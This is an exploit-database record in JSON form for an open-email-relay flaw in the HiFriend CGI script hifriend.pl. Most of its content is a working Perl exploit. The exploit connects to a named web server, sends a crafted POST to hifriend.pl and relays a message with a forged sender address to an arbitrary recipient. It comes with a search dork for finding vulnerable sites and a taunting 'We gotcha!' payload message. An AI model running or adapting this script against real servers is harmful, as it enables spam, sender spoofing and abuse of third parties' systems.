Description
HiFriend - cgi-binhifriend.pl Open Email Relay
{"lastseen": "2020-04-01T19:04:19", "references": [], "description": "\nHiFriend - cgi-binhifriend.pl Open Email Relay", "edition": 1, "reporter": "Perforin", "exploitpack": {"type": "webapps", "platform": "cgi"}, "published": "2008-07-21T00:00:00", "title": "HiFriend - cgi-binhifriend.pl Open Email Relay", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.0, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2008-07-21T00:00:00", "id": "EXPLOITPACK:A91FE866B4E6B1091C02DAEE242C8424", "href": "", "viewCount": 4, "sourceData": "source: https://www.securityfocus.com/bid/30320/info\n\nHiFriend is prone to an open-email-relay vulnerability.\n\nAn attacker could exploit this issue by constructing a script that would send unsolicited bulk email to an unrestricted amount of email addresses with a forged email address.\n\n#!/usr/bin/perl\n=pod\n----------------------------\n------Header Injection------\n----------------------------\n\nScript: hifriend.pl\nVendor: Hibyte Software\nVersion: The free one you get from many webpages\nDork: \"hifriend.pl\" + \"cgi-bin\"\n\nFound & coded by Perforin\n\nwww.DarK-CodeZ.com\nwww.vx.perforin.de.vu\n\n\nGreetz to: SkyOut,Sph1nX,zer0day,Rayden,Neo2k8,Cactus,MereX and all my Friends out there!\n=cut\n\nuse strict;\nuse warnings;\nuse IO::Socket::INET;\n\n\nmy($MSG,$lngt,$data,$sock,$add,%config);\n\n# Here\u001b%G\u00c5\u00bd\u001b%@s your Message\n\n$MSG = <<\"TXT\";\narf arf arf \nWe gotcha!\n\nVisit http://DarK-CodeZ.com\n\nGerman VX Community\n\nTXT\n\n# No im not making a friendly Code where you just have to start and type your shit in.\n# Use brain.exe to fill in the stuff you need.\n\n%config = (\nServer => \"sweetscents.com\",\nPath => \"/cgi-bin/\",\nFrom => \"admin\".chr(64).\"freehostia.com\",\nTo => \"Luxpower\".chr(64).\"web.de\",\nName => \"Perforin\",\nMSG => \"$MSG\"\n);\n\n\n$sock = new IO::Socket::INET(PeerAddr => $config{'Server'},\n PeerPort => 80,\n Proto => 'tcp',\n Timeout => 1) || die(\"[+] Could not connect!\\n\");\n\t\t\t\t\t\t\t\t\n\n$data = 'refpage=&reftitle=&Friends='.$config{'To'}.'&SenderName='.$config{'Name'}.'&From='.$config{'From'}.'&PersonalMsg='.$config{'MSG'};\n\n$lngt = length($data);\n\nprint $sock \"POST $config{'Path'}hifriend.pl?sp=y HTTP/1.1\\n\";\nprint $sock \"Host: $config{'Server'}\\n\";\nprint $sock \"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12\\n\";\nprint $sock \"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\\n\";\nprint $sock \"Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\\n\";\nprint $sock \"Accept-Encoding: gzip,deflate\\n\";\nprint $sock \"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\n\";\nprint $sock \"Keep-Alive: 300\\n\";\nprint $sock \"Connection: keep-alive\\n\";\nprint $sock \"Referer: $config{'Server'}/cgi-bin/hifriend.pl\\n\";\nprint $sock \"Accept-Language: en-us\\n\";\nprint $sock \"Content-Type: application/x-www-form-urlencoded\\n\";\nprint $sock \"User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7. Gecko/20070421 Firefox/2.0.0\\n\";\nprint $sock \"Content-Length: $lngt\\n\\n\";\nprint $sock \"$data\\n\";\n\nprint \"[+] Done!\";", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645594997, "score": 1659818015}, "_internal": {"score_hash": "3d597c3f6b5783a3502baa0c85bde851"}}
{}
HiFriend - cgi-binhifriend.pl Open Email Relay